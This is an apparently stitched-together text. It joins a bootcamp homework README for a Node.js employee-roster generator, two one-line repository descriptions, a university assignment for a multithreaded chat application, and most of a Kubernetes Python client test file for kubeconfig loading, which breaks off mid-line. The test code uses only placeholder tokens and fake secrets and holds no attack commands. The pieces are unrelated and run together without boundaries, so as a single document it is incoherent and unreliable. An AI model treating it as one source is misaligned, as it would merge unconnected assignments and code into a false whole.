# Unit 10 OOP Homework: Template Engine - Employee Summary One of the most important aspects of programming is writing code that is readable, reliable, and maintainable. Oftentimes, *how* we design our code is just as important as the code itself. In this homework assignment, your challenge is to build a Node CLI that takes in information about employees and generates an HTML webpage that displays summaries for each person. Since testing is a key piece in making code maintainable, you will also be ensuring that all unit tests pass. ## Instructions You will build a software engineering team generator command line application. The application will prompt the user for information about the team manager and then information about the team members. The user can input any number of team members, and they may be a mix of engineers and interns. This assignment must also pass all unit tests. When the user has completed building the team, the application will create an HTML file that displays a nicely formatted team roster based on the information provided by the user. Following the [common templates for user stories](https://en.wikipedia.org/wiki/User_story#Common_templates), we can frame this challenge as follows: ``` As a manager I want to generate a webpage that displays my team's basic info so that I have quick access to emails and GitHub profiles ``` How do you deliver this? Here are some guidelines: * Use the [Inquirer npm package](https://github.com/SBoudrias/Inquirer.js/) to prompt the user for their email, id, and specific information based on their role with the company. For instance, an intern may provide their school, whereas an engineer may provide their GitHub username. * Your app will run as a Node CLI to gather information about each employee. * Below is an example of what your application may look like. Remember, the styling is completely up to you so try to make it unique.   In the `Develop` folder, there is a `package.json`, so make sure to `npm install`. The dependencies are, [jest](https://jestjs.io/) for running the provided tests, and [inquirer](https://www.npmjs.com/package/inquirer) for collecting input from the user. There are also unit tests to help you build the classes necessary. It is recommended that you follow this workflow: 1. Run tests 2. Create or update classes to pass a single test case 3. Repeat 🎗 Remember, you can run the tests at any time with `npm run test` It is recommended that you start with a directory structure that looks like this: ``` lib/ // classes and helper code output/ // rendered output templates/ // HTML template(s) test/ // jest tests Employee.test.js Engineer.test.js Intern.test.js Manager.test.js app.js // Runs the application ``` ### Hints * Create multiple HTML templates for each type of user. For example, you could use the following templates: * `main.html` * `engineer.html` * `intern.html` * `manager.html` * You will want to make your methods as pure as possible. This means try to make your methods simple so that they are easier to test. * The different employee types should all inherit some methods and properties from a base class of `Employee`. * In your HTML template files, you may want to add a placeholder character that helps your program identify where the dynamic markup begins and ends. ## Minimum Requirements * Functional application. * GitHub repository with a unique name and a README describing the project. * User can use the CLI to generate an HTML page that displays information about their team. * All tests must pass. ### Classes The project must have the these classes: `Employee`, `Manager`, `Engineer`, `Intern`. The tests for these classes in the `tests` directory must all pass. The first class is an `Employee` parent class with the following properties and methods: * name * id * email * getName() * getId() * getEmail() * getRole() // Returns 'Employee' The other three classes will extend `Employee`. In addition to `Employee`'s properties and methods, `Manager` will also have: * officeNumber * getOfficeNumber() * getRole() // Overridden to return 'Manager' In addition to `Employee`'s properties and methods, `Engineer` will also have: * github // GitHub username * getGithub() * getRole() // Overridden to return 'Engineer' In addition to `Employee`'s properties and methods, `Intern` will also have: * school * getSchool() * getRole() // Overridden to return 'Intern' ### User input The project must prompt the user to build an engineering team. An engineering team consists of a manager, and any number of engineers and interns. ### Roster output The project must generate a `team.html` page in the `output` directory, that displays a nicely formatted team roster. Each team member should display the following in no particular order: * Name * Role * ID * Role-specific property (School, link to GitHub profile, or office number) ## Bonus * Use validation to ensure that the information provided is in the proper expected format. * Add the application to your portfolio. ## Commit Early and Often One of the most important skills to master as a web developer is version control. Building the habit of committing via Git is important for two reasons: * Your commit history is a signal to employers that you are actively working on projects and learning new skills. * Your commit history allows you to revert your codebase in the event that you need to return to a previous state. Follow these guidelines for committing: * Make single-purpose commits for related changes to ensure a clean, manageable history. If you are fixing two issues, make two commits. * Write descriptive, meaningful commit messages so that you and anyone else looking at your repository can easily understand its history. * Don't commit half-done work, for the sake of your collaborators (and your future self!). * Test your application before you commit to ensure functionality at every step in the development process. We would like you to have well over 200 commits by graduation, so commit early and often! ## Submission on BCS You are required to submit the following: * The URL of the GitHub repository * A video demonstrating the entirety of the app's functionality - - - © 2019 Trilogy Education Services, a 2U, Inc. brand. All Rights Reserved.

A list of reserved words for your system. Prevent users from picking usernames that is used by your system.

Official JavaScript SDK and CLI for username.dev — username governance API

CS 454: Software Engineering for Distributed Systems Multi-Client and Multithreaded Chatting Application Objective The aim of this assignment is to create a simple multithreaded chatting application that utilizes: (i) a client-server architecture, (ii) socket programming, and (iii) multithreading. The chatting application should utilize a GUI for the involved clients, through which any information, requested from the client, would be entered. The chatting application should provide the following list of features: • Supported Clients: The application should support four clients concurrently at least. • Logging into the application: To use the chatting application, existing users would need to login, while new users need to register first. To login, the user needs to send his username and password. To register, the user needs to send his name, username, and password. Invalid login/registration scenarios should be handled as follows: o if password is wrong, 401 error should appear o if username is not found, 404 error should appear (not found) o if a username cannot be used to register a new user because it is already reserved, some custom error should appear. • Contacts list: Once logged in, the user can see his own list of contacts in his GUI client. Contacts may be added by a user, provided that such contact person is notified and approves that addition in advance. • Handling concurrent messages: Each client should be able to handle concurrent messages from multiple origins. • One-to-one chat: A user can have a private chat with a client from his contact list only. • One-to-several: A user can have a multicast chat with several clients from his contact list. • Join existing chat: A user can join an ongoing one-to-one or one-to-many chat • Blocking inappropriate content: All the content written by all clients should be monitored by the server. If an inappropriate word is written, the client who wrote that word should be kicked out from his current chat, and a counter of his warnings should be kept on the server. P.S. You must handle any exceptions that may occur. Team size: The assignment should be done in teams of size 2 at most. Submission: You should submit all the needed source code to properly run the application, as one zip file. Submission should be done solely through Blackboard. Email submissions will be ignored. Deadline: Monday, November 30 th at 11:59 pm.

#!/usr/bin/env python # Copyright 2018 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import base64 import datetime import json import os import shutil import tempfile import unittest import mock import yaml from six import PY3, next from kubernetes.client import Configuration from .config_exception import ConfigException from .kube_config import (ENV_KUBECONFIG_PATH_SEPARATOR, ConfigNode, FileOrData, KubeConfigLoader, KubeConfigMerger, _cleanup_temp_files, _create_temp_file_with_content, list_kube_config_contexts, load_kube_config, new_client_from_config) BEARER_TOKEN_FORMAT = "Bearer %s" EXPIRY_DATETIME_FORMAT = "%Y-%m-%dT%H:%M:%SZ" # should be less than kube_config.EXPIRY_SKEW_PREVENTION_DELAY PAST_EXPIRY_TIMEDELTA = 2 # should be more than kube_config.EXPIRY_SKEW_PREVENTION_DELAY FUTURE_EXPIRY_TIMEDELTA = 60 NON_EXISTING_FILE = "zz_non_existing_file_472398324" def _base64(string): return base64.standard_b64encode(string.encode()).decode() def _urlsafe_unpadded_b64encode(string): return base64.urlsafe_b64encode(string.encode()).decode().rstrip("=") def _format_expiry_datetime(dt): return dt.strftime(EXPIRY_DATETIME_FORMAT) def _get_expiry(loader, active_context): expired_gcp_conf = ( item for item in loader._config.value.get("users") if item.get("name") == active_context) return next(expired_gcp_conf).get("user").get("auth-provider") \ .get("config").get("expiry") def _raise_exception(st): raise Exception(st) TEST_FILE_KEY = "file" TEST_DATA_KEY = "data" TEST_FILENAME = "test-filename" TEST_DATA = "test-data" TEST_DATA_BASE64 = _base64(TEST_DATA) TEST_ANOTHER_DATA = "another-test-data" TEST_ANOTHER_DATA_BASE64 = _base64(TEST_ANOTHER_DATA) TEST_HOST = "test-host" TEST_USERNAME = "me" TEST_PASSWORD = "pass" # token for me:pass TEST_BASIC_TOKEN = "Basic bWU6cGFzcw==" DATETIME_EXPIRY_PAST = datetime.datetime.utcnow() - datetime.timedelta( minutes=PAST_EXPIRY_TIMEDELTA) DATETIME_EXPIRY_FUTURE = datetime.datetime.utcnow() + datetime.timedelta( minutes=FUTURE_EXPIRY_TIMEDELTA) TEST_TOKEN_EXPIRY_PAST = _format_expiry_datetime(DATETIME_EXPIRY_PAST) TEST_SSL_HOST = "https://test-host" TEST_CERTIFICATE_AUTH = "cert-auth" TEST_CERTIFICATE_AUTH_BASE64 = _base64(TEST_CERTIFICATE_AUTH) TEST_CLIENT_KEY = "client-key" TEST_CLIENT_KEY_BASE64 = _base64(TEST_CLIENT_KEY) TEST_CLIENT_CERT = "client-cert" TEST_CLIENT_CERT_BASE64 = _base64(TEST_CLIENT_CERT) TEST_OIDC_TOKEN = "test-oidc-token" TEST_OIDC_INFO = "{\"name\": \"test\"}" TEST_OIDC_BASE = ".".join([ _urlsafe_unpadded_b64encode(TEST_OIDC_TOKEN), _urlsafe_unpadded_b64encode(TEST_OIDC_INFO) ]) TEST_OIDC_LOGIN = ".".join( [TEST_OIDC_BASE, _urlsafe_unpadded_b64encode(TEST_CLIENT_CERT_BASE64)]) TEST_OIDC_TOKEN = "Bearer %s" % TEST_OIDC_LOGIN TEST_OIDC_EXP = "{\"name\": \"test\",\"exp\": 536457600}" TEST_OIDC_EXP_BASE = _urlsafe_unpadded_b64encode( TEST_OIDC_TOKEN) + "." + _urlsafe_unpadded_b64encode(TEST_OIDC_EXP) TEST_OIDC_EXPIRED_LOGIN = ".".join( [TEST_OIDC_EXP_BASE, _urlsafe_unpadded_b64encode(TEST_CLIENT_CERT)]) TEST_OIDC_CONTAINS_RESERVED_CHARACTERS = ".".join([ _urlsafe_unpadded_b64encode(TEST_OIDC_TOKEN), _urlsafe_unpadded_b64encode(TEST_OIDC_INFO).replace("a", "+"), _urlsafe_unpadded_b64encode(TEST_CLIENT_CERT) ]) TEST_OIDC_INVALID_PADDING_LENGTH = ".".join([ _urlsafe_unpadded_b64encode(TEST_OIDC_TOKEN), "aaaaa", _urlsafe_unpadded_b64encode(TEST_CLIENT_CERT) ]) TEST_OIDC_CA = _base64(TEST_CERTIFICATE_AUTH) class BaseTestCase(unittest.TestCase): def setUp(self): self._temp_files = [] def tearDown(self): for f in self._temp_files: os.remove(f) def _create_temp_file(self, content=""): handler, name = tempfile.mkstemp() self._temp_files.append(name) os.write(handler, str.encode(content)) os.close(handler) return name def expect_exception(self, func, message_part, *args, **kwargs): with self.assertRaises(ConfigException) as context: func(*args, **kwargs) self.assertIn(message_part, str(context.exception)) class TestFileOrData(BaseTestCase): @staticmethod def get_file_content(filename): with open(filename) as f: return f.read() def test_file_given_file(self): temp_filename = _create_temp_file_with_content(TEST_DATA) obj = {TEST_FILE_KEY: temp_filename} t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY) self.assertEqual(TEST_DATA, self.get_file_content(t.as_file())) def test_file_given_non_existing_file(self): temp_filename = NON_EXISTING_FILE obj = {TEST_FILE_KEY: temp_filename} t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY) self.expect_exception(t.as_file, "does not exists") def test_file_given_data(self): obj = {TEST_DATA_KEY: TEST_DATA_BASE64} t = FileOrData( obj=obj, file_key_name=TEST_FILE_KEY, data_key_name=TEST_DATA_KEY) self.assertEqual(TEST_DATA, self.get_file_content(t.as_file())) def test_file_given_data_no_base64(self): obj = {TEST_DATA_KEY: TEST_DATA} t = FileOrData( obj=obj, file_key_name=TEST_FILE_KEY, data_key_name=TEST_DATA_KEY, base64_file_content=False) self.assertEqual(TEST_DATA, self.get_file_content(t.as_file())) def test_data_given_data(self): obj = {TEST_DATA_KEY: TEST_DATA_BASE64} t = FileOrData( obj=obj, file_key_name=TEST_FILE_KEY, data_key_name=TEST_DATA_KEY) self.assertEqual(TEST_DATA_BASE64, t.as_data()) def test_data_given_file(self): obj = {TEST_FILE_KEY: self._create_temp_file(content=TEST_DATA)} t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY) self.assertEqual(TEST_DATA_BASE64, t.as_data()) def test_data_given_file_no_base64(self): obj = {TEST_FILE_KEY: self._create_temp_file(content=TEST_DATA)} t = FileOrData( obj=obj, file_key_name=TEST_FILE_KEY, base64_file_content=False) self.assertEqual(TEST_DATA, t.as_data()) def test_data_given_file_and_data(self): obj = { TEST_DATA_KEY: TEST_DATA_BASE64, TEST_FILE_KEY: self._create_temp_file(content=TEST_ANOTHER_DATA) } t = FileOrData( obj=obj, file_key_name=TEST_FILE_KEY, data_key_name=TEST_DATA_KEY) self.assertEqual(TEST_DATA_BASE64, t.as_data()) def test_file_given_file_and_data(self): obj = { TEST_DATA_KEY: TEST_DATA_BASE64, TEST_FILE_KEY: self._create_temp_file(content=TEST_ANOTHER_DATA) } t = FileOrData( obj=obj, file_key_name=TEST_FILE_KEY, data_key_name=TEST_DATA_KEY) self.assertEqual(TEST_DATA, self.get_file_content(t.as_file())) def test_file_with_custom_dirname(self): tempfile = self._create_temp_file(content=TEST_DATA) tempfile_dir = os.path.dirname(tempfile) tempfile_basename = os.path.basename(tempfile) obj = {TEST_FILE_KEY: tempfile_basename} t = FileOrData( obj=obj, file_key_name=TEST_FILE_KEY, file_base_path=tempfile_dir) self.assertEqual(TEST_DATA, self.get_file_content(t.as_file())) def test_create_temp_file_with_content(self): self.assertEqual( TEST_DATA, self.get_file_content(_create_temp_file_with_content(TEST_DATA))) _cleanup_temp_files() def test_file_given_data_bytes(self): obj = {TEST_DATA_KEY: TEST_DATA_BASE64.encode()} t = FileOrData( obj=obj, file_key_name=TEST_FILE_KEY, data_key_name=TEST_DATA_KEY) self.assertEqual(TEST_DATA, self.get_file_content(t.as_file())) def test_file_given_data_bytes_no_base64(self): obj = {TEST_DATA_KEY: TEST_DATA.encode()} t = FileOrData( obj=obj, file_key_name=TEST_FILE_KEY, data_key_name=TEST_DATA_KEY, base64_file_content=False) self.assertEqual(TEST_DATA, self.get_file_content(t.as_file())) class TestConfigNode(BaseTestCase): test_obj = { "key1": "test", "key2": ["a", "b", "c"], "key3": { "inner_key": "inner_value" }, "with_names": [{ "name": "test_name", "value": "test_value" }, { "name": "test_name2", "value": {"key1", "test"} }, { "name": "test_name3", "value": [1, 2, 3] }], "with_names_dup": [{ "name": "test_name", "value": "test_value" }, { "name": "test_name", "value": {"key1", "test"} }, { "name": "test_name3", "value": [1, 2, 3] }] } def setUp(self): super(TestConfigNode, self).setUp() self.node = ConfigNode("test_obj", self.test_obj) def test_normal_map_array_operations(self): self.assertEqual("test", self.node["key1"]) self.assertEqual(5, len(self.node)) self.assertEqual("test_obj/key2", self.node["key2"].name) self.assertEqual(["a", "b", "c"], self.node["key2"].value) self.assertEqual("b", self.node["key2"][1]) self.assertEqual(3, len(self.node["key2"])) self.assertEqual("test_obj/key3", self.node["key3"].name) self.assertEqual({"inner_key": "inner_value"}, self.node["key3"].value) self.assertEqual("inner_value", self.node["key3"]["inner_key"]) self.assertEqual(1, len(self.node["key3"])) def test_get_with_name(self): node = self.node["with_names"] self.assertEqual("test_value", node.get_with_name("test_name")["value"]) self.assertTrue(isinstance(node.get_with_name("test_name2"), ConfigNode)) self.assertTrue(isinstance(node.get_with_name("test_name3"), ConfigNode)) self.assertEqual("test_obj/with_names[name=test_name2]", node.get_with_name("test_name2").name) self.assertEqual("test_obj/with_names[name=test_name3]", node.get_with_name("test_name3").name) def test_key_does_not_exists(self): self.expect_exception(lambda: self.node["not-exists-key"], "Expected key not-exists-key in test_obj") self.expect_exception(lambda: self.node["key3"]["not-exists-key"], "Expected key not-exists-key in test_obj/key3") def test_get_with_name_on_invalid_object(self): self.expect_exception( lambda: self.node["key2"].get_with_name("no-name"), "Expected all values in test_obj/key2 list to have \'name\' key") def test_get_with_name_on_non_list_object(self): self.expect_exception(lambda: self.node["key3"].get_with_name("no-name"), "Expected test_obj/key3 to be a list") def test_get_with_name_on_name_does_not_exists(self): self.expect_exception( lambda: self.node["with_names"].get_with_name("no-name"), "Expected object with name no-name in test_obj/with_names list") def test_get_with_name_on_duplicate_name(self): self.expect_exception( lambda: self.node["with_names_dup"].get_with_name("test_name"), "Expected only one object with name test_name in " "test_obj/with_names_dup list") class FakeConfig: FILE_KEYS = ["ssl_ca_cert", "key_file", "cert_file"] def __init__(self, token=None, **kwargs): self.api_key = {} if token: self.api_key["authorization"] = token self.__dict__.update(kwargs) def __eq__(self, other): if len(self.__dict__) != len(other.__dict__): return for k, v in self.__dict__.items(): if k not in other.__dict__: return if k in self.FILE_KEYS: if v and other.__dict__[k]: try: with open(v) as f1, open(other.__dict__[k]) as f2: if f1.read() != f2.read(): return except IOError: # fall back to only compare filenames in case we are # testing the passing of filenames to the config if other.__dict__[k] != v: return else: if other.__dict__[k] != v: return else: if other.__dict__[k] != v: return return True def __repr__(self): rep = "\n" for k, v in self.__dict__.items(): val = v if k in self.FILE_KEYS: try: with open(v) as f: val = "FILE: %s" % str.decode(f.read()) except IOError as e: val = "ERROR: %s" % str(e) rep += "\t%s: %s\n" % (k, val) return "Config(%s\n)" % rep class TestKubeConfigLoader(BaseTestCase): TEST_KUBE_CONFIG = { "current-context": "no_user", "contexts": [ { "name": "no_user", "context": { "cluster": "default" } }, { "name": "simple_token", "context": { "cluster": "default", "user": "simple_token" } }, { "name": "gcp", "context": { "cluster": "default", "user": "gcp" } }, { "name": "expired_gcp", "context": { "cluster": "default", "user": "expired_gcp" } }, { "name": "expired_gcp_refresh", "context": { "cluster": "default", "user": "expired_gcp_refresh" } }, { "name": "oidc", "context": { "cluster": "default", "user": "oidc" } }, { "name": "expired_oidc", "context": { "cluster": "default", "user": "expired_oidc" } }, { "name": "expired_oidc_nocert", "context": { "cluster": "default", "user": "expired_oidc_nocert" } }, { "name": "oidc_contains_reserved_character", "context": { "cluster": "default", "user": "oidc_contains_reserved_character" } }, { "name": "oidc_invalid_padding_length", "context": { "cluster": "default", "user": "oidc_invalid_padding_length" } }, { "name": "user_pass", "context": { "cluster": "default", "user": "user_pass" } }, { "name": "ssl", "context": { "cluster": "ssl", "user": "ssl" } }, { "name": "no_ssl_verification", "context": { "cluster": "no_ssl_verification", "user": "ssl" } }, { "name": "ssl-no_file", "context": { "cluster": "ssl-no_file", "user": "ssl-no_file" } }, { "name": "ssl-local-file", "context": { "cluster": "ssl-local-file", "user": "ssl-local-file" } }, { "name": "non_existing_user", "context": { "cluster": "default", "user": "non_existing_user" } }, { "name": "exec_cred_user", "context": { "cluster": "default", "user": "exec_cred_user" } }, ], "clusters": [ { "name": "default", "cluster": { "server": TEST_HOST } }, { "name": "ssl-no_file", "cluster": { "server": TEST_SSL_HOST, "certificate-authority": TEST_CERTIFICATE_AUTH, } }, { "name": "ssl-local-file", "cluster": { "server": TEST_SSL_HOST, "certificate-authority": "cert_test", } }, { "name": "ssl", "cluster": { "server": TEST_SSL_HOST, "certificate-authority-data": TEST_CERTIFICATE_AUTH_BASE64, } }, { "name": "no_ssl_verification", "cluster": { "server": TEST_SSL_HOST, "insecure-skip-tls-verify": "true", } }, ], "users": [ { "name": "simple_token", "user": { "token": TEST_DATA_BASE64, "username": TEST_USERNAME, # should be ignored "password": TEST_PASSWORD, # should be ignored } }, { "name": "gcp", "user": { "auth-provider": { "name": "gcp", "config": { "access-token": TEST_DATA_BASE64, } }, "token": TEST_DATA_BASE64, # should be ignored "username": TEST_USERNAME, # should be ignored "password": TEST_PASSWORD, # should be ignored } }, { "name": "expired_gcp", "user": { "auth-provider": { "name": "gcp", "config": { "access-token": TEST_DATA_BASE64, "expiry": TEST_TOKEN_EXPIRY_PAST, # always in past } }, "token": TEST_DATA_BASE64, # should be ignored "username": TEST_USERNAME, # should be ignored "password": TEST_PASSWORD, # should be ignored } }, # Duplicated from "expired_gcp" so test_load_gcp_token_with_refresh # is isolated from test_gcp_get_api_key_with_prefix. { "name": "expired_gcp_refresh", "user": { "auth-provider": { "name": "gcp", "config": { "access-token": TEST_DATA_BASE64, "expiry": TEST_TOKEN_EXPIRY_PAST, # always in past } }, "token": TEST_DATA_BASE64, # should be ignored "username": TEST_USERNAME, # should be ignored "password": TEST_PASSWORD, # should be ignored } }, { "name": "oidc", "user": { "auth-provider": { "name": "oidc", "config": { "id-token": TEST_OIDC_LOGIN } } } }, { "name": "expired_oidc", "user": { "auth-provider": { "name": "oidc", "config": { "client-id": "tectonic-kubectl", "client-secret": "FAKE_SECRET", "id-token": TEST_OIDC_EXPIRED_LOGIN, "idp-certificate-authority-data": TEST_OIDC_CA, "idp-issuer-url": "https://example.org/identity", "refresh-token": "lucWJjEhlxZW01cXI3YmVlcYnpxNGhzk" } } } }, { "name": "expired_oidc_nocert", "user": { "auth-provider": { "name": "oidc", "config": { "client-id": "tectonic-kubectl", "client-secret": "FAKE_SECRET", "id-token": TEST_OIDC_EXPIRED_LOGIN, "idp-issuer-url": "https://example.org/identity", "refresh-token": "lucWJjEhlxZW01cXI3YmVlcYnpxNGhzk" } } } }, { "name": "oidc_contains_reserved_character", "user": { "auth-provider": { "name": "oidc", "config": { "client-id": "tectonic-kubectl", "client-secret": "FAKE_SECRET", "id-token": TEST_OIDC_CONTAINS_RESERVED_CHARACTERS, "idp-issuer-url": "https://example.org/identity", "refresh-token": "lucWJjEhlxZW01cXI3YmVlcYnpxNGhzk" } } } }, { "name": "oidc_invalid_padding_length", "user": { "auth-provider": { "name": "oidc", "config": { "client-id": "tectonic-kubectl", "client-secret": "FAKE_SECRET", "id-token": TEST_OIDC_INVALID_PADDING_LENGTH, "idp-issuer-url": "https://example.org/identity", "refresh-token": "lucWJjEhlxZW01cXI3YmVlcYnpxNGhzk" } } } }, { "name": "user_pass", "user": { "username": TEST_USERNAME, # should be ignored "password": TEST_PASSWORD, # should be ignored } }, { "name": "ssl-no_file", "user": { "token": TEST_DATA_BASE64, "client-certificate": TEST_CLIENT_CERT, "client-key": TEST_CLIENT_KEY, } }, { "name": "ssl-local-file", "user": { "tokenFile": "token_file", "client-certificate": "client_cert", "client-key": "client_key", } }, { "name": "ssl", "user": { "token": TEST_DATA_BASE64, "client-certificate-data": TEST_CLIENT_CERT_BASE64, "client-key-data": TEST_CLIENT_KEY_BASE64, } }, { "name": "exec_cred_user", "user": { "exec": { "apiVersion": "client.authentication.k8s.io/v1beta1", "command": "aws-iam-authenticator", "args": ["token", "-i", "dummy-cluster"] } } }, ] } def test_no_user_context(self): expected = FakeConfig(host=TEST_HOST) actual = FakeConfig() KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="no_user").load_and_set(actual) self.assertEqual(expected, actual) def test_simple_token(self): expected = FakeConfig( host=TEST_HOST, token=BEARER_TOKEN_FORMAT % TEST_DATA_BASE64) actual = FakeConfig() KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="simple_token").load_and_set(actual) self.assertEqual(expected, actual) def test_load_user_token(self): loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="simple_token") self.assertTrue(loader._load_user_token()) self.assertEqual(BEARER_TOKEN_FORMAT % TEST_DATA_BASE64, loader.token) def test_gcp_no_refresh(self): fake_config = FakeConfig() # swagger-generated config has this, but FakeConfig does not. self.assertFalse(hasattr(fake_config, "get_api_key_with_prefix")) KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="gcp", get_google_credentials=lambda: _raise_exception("SHOULD NOT BE CALLED") ).load_and_set(fake_config) # Should now be populated with a gcp token fetcher. self.assertIsNotNone(fake_config.get_api_key_with_prefix) self.assertEqual(TEST_HOST, fake_config.host) # For backwards compatibility, authorization field should still be set. self.assertEqual(BEARER_TOKEN_FORMAT % TEST_DATA_BASE64, fake_config.api_key["authorization"]) def test_load_gcp_token_no_refresh(self): loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="gcp", get_google_credentials=lambda: _raise_exception("SHOULD NOT BE CALLED")) self.assertTrue(loader._load_auth_provider_token()) self.assertEqual(BEARER_TOKEN_FORMAT % TEST_DATA_BASE64, loader.token) def test_load_gcp_token_with_refresh(self): def cred(): return None cred.token = TEST_ANOTHER_DATA_BASE64 cred.expiry = datetime.datetime.utcnow() loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="expired_gcp", get_google_credentials=lambda: cred) original_expiry = _get_expiry(loader, "expired_gcp") self.assertTrue(loader._load_auth_provider_token()) new_expiry = _get_expiry(loader, "expired_gcp") # assert that the configs expiry actually updates self.assertTrue(new_expiry > original_expiry) self.assertEqual(BEARER_TOKEN_FORMAT % TEST_ANOTHER_DATA_BASE64, loader.token) def test_gcp_get_api_key_with_prefix(self): class cred_old: token = TEST_DATA_BASE64 expiry = DATETIME_EXPIRY_PAST class cred_new: token = TEST_ANOTHER_DATA_BASE64 expiry = DATETIME_EXPIRY_FUTURE fake_config = FakeConfig() _get_google_credentials = mock.Mock() _get_google_credentials.side_effect = [cred_old, cred_new] loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="expired_gcp_refresh", get_google_credentials=_get_google_credentials) loader.load_and_set(fake_config) original_expiry = _get_expiry(loader, "expired_gcp_refresh") # Call GCP token fetcher. token = fake_config.get_api_key_with_prefix() new_expiry = _get_expiry(loader, "expired_gcp_refresh") self.assertTrue(new_expiry > original_expiry) self.assertEqual(BEARER_TOKEN_FORMAT % TEST_ANOTHER_DATA_BASE64, loader.token) self.assertEqual(BEARER_TOKEN_FORMAT % TEST_ANOTHER_DATA_BASE64, token) def test_oidc_no_refresh(self): loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="oidc", ) self.assertTrue(loader._load_auth_provider_token()) self.assertEqual(TEST_OIDC_TOKEN, loader.token) @mock.patch("kubernetes.config.kube_config.OAuth2Session.refresh_token") @mock.patch("kubernetes.config.kube_config.ApiClient.request") def test_oidc_with_refresh(self, mock_ApiClient, mock_OAuth2Session): mock_response = mock.MagicMock() type(mock_response).status = mock.PropertyMock(return_value=200) type(mock_response).data = mock.PropertyMock( return_value=json.dumps( {"token_endpoint": "https://example.org/identity/token"})) mock_ApiClient.return_value = mock_response mock_OAuth2Session.return_value = { "id_token": "abc123", "refresh_token": "newtoken123" } loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="expired_oidc", ) self.assertTrue(loader._load_auth_provider_token()) self.assertEqual("Bearer abc123", loader.token) @mock.patch("kubernetes.config.kube_config.OAuth2Session.refresh_token") @mock.patch("kubernetes.config.kube_config.ApiClient.request") def test_oidc_with_refresh_nocert(self, mock_ApiClient, mock_OAuth2Session): mock_response = mock.MagicMock() type(mock_response).status = mock.PropertyMock(return_value=200) type(mock_response).data = mock.PropertyMock( return_value=json.dumps( {"token_endpoint": "https://example.org/identity/token"})) mock_ApiClient.return_value = mock_response mock_OAuth2Session.return_value = { "id_token": "abc123", "refresh_token": "newtoken123" } loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="expired_oidc_nocert", ) self.assertTrue(loader._load_auth_provider_token()) self.assertEqual("Bearer abc123", loader.token) def test_oidc_fails_if_contains_reserved_chars(self): loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="oidc_contains_reserved_character", ) self.assertEqual( loader._load_oid_token("oidc_contains_reserved_character"), None, ) def test_oidc_fails_if_invalid_padding_length(self): loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="oidc_invalid_padding_length", ) self.assertEqual( loader._load_oid_token("oidc_invalid_padding_length"), None, ) def test_user_pass(self): expected = FakeConfig(host=TEST_HOST, token=TEST_BASIC_TOKEN) actual = FakeConfig() KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="user_pass").load_and_set(actual) self.assertEqual(expected, actual) def test_load_user_pass_token(self): loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="user_pass") self.assertTrue(loader._load_user_pass_token()) self.assertEqual(TEST_BASIC_TOKEN, loader.token) def test_ssl_no_cert_files(self): loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="ssl-no_file") self.expect_exception(loader.load_and_set, "does not exists", FakeConfig()) def test_ssl(self): expected = FakeConfig( host=TEST_SSL_HOST, token=BEARER_TOKEN_FORMAT % TEST_DATA_BASE64, cert_file=self._create_temp_file(TEST_CLIENT_CERT), key_file=self._create_temp_file(TEST_CLIENT_KEY), ssl_ca_cert=self._create_temp_file(TEST_CERTIFICATE_AUTH)) actual = FakeConfig() KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="ssl").load_and_set(actual) self.assertEqual(expected, actual) def test_ssl_no_verification(self): expected = FakeConfig( host=TEST_SSL_HOST, token=BEARER_TOKEN_FORMAT % TEST_DATA_BASE64, cert_file=self._create_temp_file(TEST_CLIENT_CERT), key_file=self._create_temp_file(TEST_CLIENT_KEY), verify_ssl=False, ssl_ca_cert=None, ) actual = FakeConfig() KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="no_ssl_verification").load_and_set(actual) self.assertEqual(expected, actual) def test_list_contexts(self): loader = KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="no_user") actual_contexts = loader.list_contexts() expected_contexts = ConfigNode("", self.TEST_KUBE_CONFIG)["contexts"] for actual in actual_contexts: expected = expected_contexts.get_with_name(actual["name"]) self.assertEqual(expected.value, actual) def test_current_context(self): loader = KubeConfigLoader(config_dict=self.TEST_KUBE_CONFIG) expected_contexts = ConfigNode("", self.TEST_KUBE_CONFIG)["contexts"] self.assertEqual( expected_contexts.get_with_name("no_user").value, loader.current_context) def test_set_active_context(self): loader = KubeConfigLoader(config_dict=self.TEST_KUBE_CONFIG) loader.set_active_context("ssl") expected_contexts = ConfigNode("", self.TEST_KUBE_CONFIG)["contexts"] self.assertEqual( expected_contexts.get_with_name("ssl").value, loader.current_context) def test_ssl_with_relative_ssl_files(self): expected = FakeConfig( host=TEST_SSL_HOST, token=BEARER_TOKEN_FORMAT % TEST_DATA_BASE64, cert_file=self._create_temp_file(TEST_CLIENT_CERT), key_file=self._create_temp_file(TEST_CLIENT_KEY), ssl_ca_cert=self._create_temp_file(TEST_CERTIFICATE_AUTH)) try: temp_dir = tempfile.mkdtemp() actual = FakeConfig() with open(os.path.join(temp_dir, "cert_test"), "wb") as fd: fd.write(TEST_CERTIFICATE_AUTH.encode()) with open(os.path.join(temp_dir, "client_cert"), 